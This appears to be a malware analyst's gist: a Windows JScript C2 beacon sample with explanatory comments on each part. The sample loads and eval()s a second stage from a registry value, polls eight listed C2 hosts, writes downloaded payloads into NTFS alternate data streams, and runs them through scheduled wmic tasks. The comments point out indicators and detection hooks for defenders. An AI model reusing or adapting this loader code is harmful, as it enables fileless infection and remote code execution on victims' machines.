@JohnHammond
Created January 29, 2021 15:22
// Analyst notes on this sample (Windows Script Host JScript). The second stage
// that this file eval()s from the registry is NOT included here, so the helper
// objects it provides (Windows, GlobalStrings, DataTools, Http, Loader) are
// described only as far as their call sites below show.
//
// Static C2 client configuration. Only COMMAND_C2, C2_OB_KEY and
// C2_COMMAND_PREFIX are read by the code in this file; the other fields are
// unused here — presumably consumed by the registry-loaded stage.
var client_config = {
// Candidate C2 hosts, tried in array order by Client.GetTask until one returns
// a recognised response. The first three resemble legitimate CDN/vendor
// hostnames — presumably decoys or abused infrastructure; treat all eight as
// network indicators for this sample rather than trusting any of them.
COMMAND_C2 : ['http://redirector.gvt1.com','http://onecs-live.azureedge.net','http://ipm-provider.ff.avast.com','http://tauhutxiga.com','http://monsuperentrepreneur.com','http://tangocation.com','http://e4a24fb0e.com','http://f78efaf43b.com'],
SOFT_SIG : 'mad24',
CLIENT_ID : 'E669F102FDFB9C8F2E538C0A8CA3CC29',
C2_REQUEST_SLEEP : 20,
C2_FAIL_SLEEP : 1,
C2_FAIL_COUNT : 3,
// Shared secret appended to the per-request nonce (GetWorkerEndpoint) or the
// client uid (GetTask) when deriving the RotString obfuscation key.
C2_OB_KEY : 'JxTRG4mY',
SOFT_VERSION : 30,
// Path component of the beacon URL; the query string is built in GetWorkerEndpoint.
C2_COMMAND_PREFIX : 'api.aspx',
C2_USE_IEXPLORE : false
}
// Not read anywhere in this file; presumably checked by the eval()'d stage.
var CLIENT_IMPORT_ENV = true;
// Namespace object; LibraryLoadContext attaches the second stage's globals to it.
var Client = {};
// WScript.Shell COM object, used below for RegRead. A script host instantiating
// WScript.Shell is itself a useful telemetry/detection point.
Client.CoMainObject = new ActiveXObject('WScript.Shell');
// Returns the second-stage script text stored in a per-user registry value
// (HKCU\Software\ApplicationContainer\Appsw64\WebLib32). Fileless staging: the
// code lives in the registry, not on disk. RegRead throws if the value is
// absent, which aborts the script in LibraryLoadContext. The value path is a
// host indicator for this sample.
Client.LoadLibraryReg = function(){
return Client.CoMainObject.RegRead("HKEY_CURRENT_USER\\Software\\ApplicationContainer\\Appsw64\\WebLib32");
}
// Executes the registry-stored stage with eval() and binds the globals it is
// expected to define onto Client. None of Windows, GlobalStrings, DataTools,
// ObjectProducer, Http, Loader or debug is defined in this file; if the stage
// does not define them the assignments below throw a ReferenceError.
// Members this file relies on (inferred from call sites only):
//   Windows.Execute / GetEnv / WriteDataStreamBytes
//   GlobalStrings.NTFILE_PATH / WMIC_EXEC / WMIC_EXEC_ARGS / TASK_CREATE
//   DataTools.Random.String / RotString / DeriveKey / Strings.ParseTemplate
//   Http.Request, Loader.GetUid
// ObjectProducer and debug are bound but never used in this file.
Client.LibraryLoadContext = function(){
// Registry contents are executed as code — the key detection/forensic point.
eval(Client.LoadLibraryReg());
Client.Windows = Windows;
Client.GlobalStrings = GlobalStrings;
Client.DataTools = DataTools;
Client.ObjectProducer = ObjectProducer;
Client.Http = Http;
Client.Loader = Loader;
Client.debug = debug;
}
// Builds the beacon request path, appended to a C2 host by GetTask:
//   api.aspx?dx11diag=<obfuscated uid>&remote=<41 random chars>&g=<nonce>&cdn=281
// The client uid (Loader.GetUid, from the eval()'d stage) is transformed with
// DataTools.RotString under a key derived from nonce + C2_OB_KEY, then
// base64- and URL-encoded. Because the nonce travels in the clear as `g` and
// C2_OB_KEY is a fixed constant, the server can presumably rebuild the key;
// this hides the uid from casual inspection rather than protecting it.
// The fixed parameter names (dx11diag, remote, g) and the constant cdn=281 are
// a stable pattern for proxy-log detection.
// RotString is given a third argument (0) here but not in GetTask; its meaning
// is not visible in this file.
Client.GetWorkerEndpoint = function(){
var nonce = Client.DataTools.Random.String(12);
var uid = Client.Loader.GetUid();
var sessionKey = nonce + client_config.C2_OB_KEY;
var encodedId = Client.DataTools.RotString(uid, Client.DataTools.DeriveKey(sessionKey), 0);
encodedId = Base64Encode(encodedId);
encodedId = encodeURIComponent(encodedId);
return client_config.C2_COMMAND_PREFIX + "?dx11diag=" + encodedId + "&remote=" + Client.DataTools.Random.String(41) + "&g=" + nonce + "&cdn=281";
}
// Schedules execution of a staged payload through a scheduled task.
// taskName: identifier taken from the C2 response; it names both the NTFS
// alternate data stream <NTFILE_PATH>:<taskName> (written by
// Windows.WriteDataStreamBytes in GetTask) and the task "SoundIndex_<taskName>".
// Time string: HH:MM roughly one minute ahead. Observed quirks, not corrected
// here: the padding test uses minutes + 3 while the value used is minutes + 1,
// and there is no carry into the hour (minutes 59 yields "60"), so the string
// is not always a valid time.
// The wmic and task-creation command lines come from templates (WMIC_EXEC,
// TASK_CREATE) defined in the registry-loaded stage; from the names, the task
// runs wmic with the ADS path. Detection hooks: task names matching
// SoundIndex_*, and wmic / schtasks-style activity spawned by a script host.
Client.PrepareExectionTask = function(taskName){
var currentTime = new Date(),
hours = currentTime.getHours(),
minutes = currentTime.getMinutes();
hours = hours < 10 ? "0" + hours.toString() : hours;
minutes = (minutes + 3) < 10 ? "0" + (minutes + 1).toString() : (minutes + 1);
var time = hours + ":" + minutes;
// "<file>:<name>" — colon-suffixed path, i.e. an NTFS alternate data stream.
var path = Client.GlobalStrings.NTFILE_PATH.concat(":").concat(taskName);
var execCommand = Client.DataTools.Strings.ParseTemplate(Client.GlobalStrings.WMIC_EXEC, "path=".concat(path).concat("&q=w"));
var taskCommand = Client.DataTools.Strings.ParseTemplate(Client.GlobalStrings.TASK_CREATE, "name=SoundIndex_".concat(taskName).concat("&command=").concat(execCommand).concat("&time=").concat(time))
Client.Windows.Execute(taskCommand);
}
// Runs a previously dropped plugin binary through the WMIC_EXEC_ARGS template.
// hostPath: %TEMP%\<uid>.bin — nothing in this file writes that file, so it is
// presumably dropped by the eval()'d stage or by an earlier task.
// pluginId: the remainder of the C2 response after '--PLUGIN--', passed
// verbatim as the "args" template field; a C2-controlled string reaches a
// command line, and how ParseTemplate quotes it is not visible here.
// Indicator: a .bin in %TEMP% named after the client uid, launched via wmic.
Client.ExecutePlugin = function(pluginId){
var hostPath = Client.Windows.GetEnv("%temp%").concat("\\").concat(Client.Loader.GetUid()).concat(".bin");
var command = Client.DataTools.Strings.ParseTemplate(Client.GlobalStrings.WMIC_EXEC_ARGS, "path=".concat(hostPath).concat("&args=").concat(pluginId));
Client.Windows.Execute(command);
}
// One beacon cycle: polls each C2 host in order and acts on the first
// recognised response, then returns. There is no retry or sleep here; the
// unused C2_*_SLEEP / C2_FAIL_COUNT settings suggest that logic lives elsewhere.
// The response body is de-obfuscated with RotString keyed by
// DeriveKey(uid + C2_OB_KEY) (no third argument, unlike GetWorkerEndpoint).
// Recognised layouts, inferred from the split() indices used below:
//   "--TASK--<taskName>--<base64 payload>"  -> payload decoded into the ADS
//       <NTFILE_PATH>:<taskName>, then scheduled via PrepareExectionTask
//   "--PLUGIN--<id>"                         -> ExecutePlugin(id)
// Any other body falls through to the next host. How an unreachable host is
// reported depends on Http.Request (not visible); if it returns null the
// indexOf() call throws and the loop aborts. Note that "--TASK" anywhere in
// the body selects the task branch, so the index arithmetic assumes the exact
// layout above.
Client.GetTask = function(){
for(var i = 0; i < client_config.COMMAND_C2.length; i++){
var response = Client.Http.Request(client_config.COMMAND_C2[i].concat("/").concat(Client.GetWorkerEndpoint()));
response = Client.DataTools.RotString(response, Client.DataTools.DeriveKey(Client.Loader.GetUid().concat(client_config.C2_OB_KEY)));
if(response.indexOf("--TASK") !== -1){
// After stripping the prefix, field [1] is the payload; field [2] of the
// original string is the task name.
var executionTask = response.replace('--TASK--', '').split('--')[1];
var taskName = response.split('--')[2];
Client.PrepareExectionTask(taskName);
// Payload bytes are hidden in an alternate data stream of NTFILE_PATH.
Client.Windows.WriteDataStreamBytes(Client.GlobalStrings.NTFILE_PATH, taskName, Base64bytes(executionTask));
return;
}
if(response.indexOf('--PLUGIN') !== -1){
var plugin = response.replace('--PLUGIN--', '');
Client.ExecutePlugin(plugin);
return;
}
}
}
// Decodes a base64 string to raw bytes using the MSXML "bin.base64" node
// conversion and returns an *open* ADODB.Stream (Type 1 = binary) holding
// them — the stream object, not a byte array. Consumed by
// Windows.WriteDataStreamBytes in GetTask; the stream is never closed here.
// MSXML2.DOMDocument + ADODB.Stream driven from a script host is a classic
// script-dropper decoding pattern worth alerting on.
function Base64bytes(string){
var XmlDOM = WScript.CreateObject("MSXml2.DOMDocument");
var element = XmlDOM.createElement("Base64Data");
element.dataType = "bin.base64";
element.text = string;
var stream = WScript.CreateObject("ADODB.Stream");
stream.Type = 1;
stream.Open();
stream.Write(element.nodeTypedValue);
return stream;
}
// Converts a JScript string to a byte array (Variant) via ADODB.Stream: the
// text is written as Type 2 (text) with CharSet "ascii", the stream is
// rewound, switched to Type 1 (binary) and read back in full. Characters
// outside ASCII would not survive the "ascii" charset — presumably acceptable
// for the uid this is applied to. ADODB requires Position = 0 before Type can
// be changed; the second Position = 0 is a defensive rewind before Read().
function StringToBinary(string){
var BinaryStream = new ActiveXObject("ADODB.Stream");
BinaryStream.Type = 2;
BinaryStream.CharSet = "ascii";
BinaryStream.Open();
BinaryStream.WriteText(string);
BinaryStream.Position = 0;
BinaryStream.Type = 1;
BinaryStream.Position = 0;
return BinaryStream.Read();
}
// Base64-encodes a string via the MSXML "bin.base64" node (inverse of
// Base64bytes). Strips newlines (MSXML wraps long base64 text) and also
// deletes every "//" sequence; the latter changes the encoded value whenever
// the output contains adjacent slashes — intent unclear, recorded as observed
// behaviour. Used by GetWorkerEndpoint before encodeURIComponent.
function Base64Encode(string) {
var XmlDOM = WScript.CreateObject("MSXml2.DOMDocument");
var element = XmlDOM.createElement("Base64Data");
element.dataType = "bin.base64";
element.nodeTypedValue = StringToBinary(string);
return element.text.replace(/\n/g, "").replace(/\/\//g, "");
}
// Entry point when the script host runs this file:
//  1. pull and eval() the second stage from the registry,
//  2. sleep 60 000 ms — likely a start-up / sandbox-timeout delay,
//  3. perform a single beacon cycle.
// No loop here; repeated execution presumably comes from the scheduled task
// this client creates or from whatever installed the registry value. A script
// host sleeping for exactly one minute and then making outbound HTTP requests
// is a reasonable behavioural signature.
Client.LibraryLoadContext();
WScript.Sleep(1 * 60 * 1000);
Client.GetTask();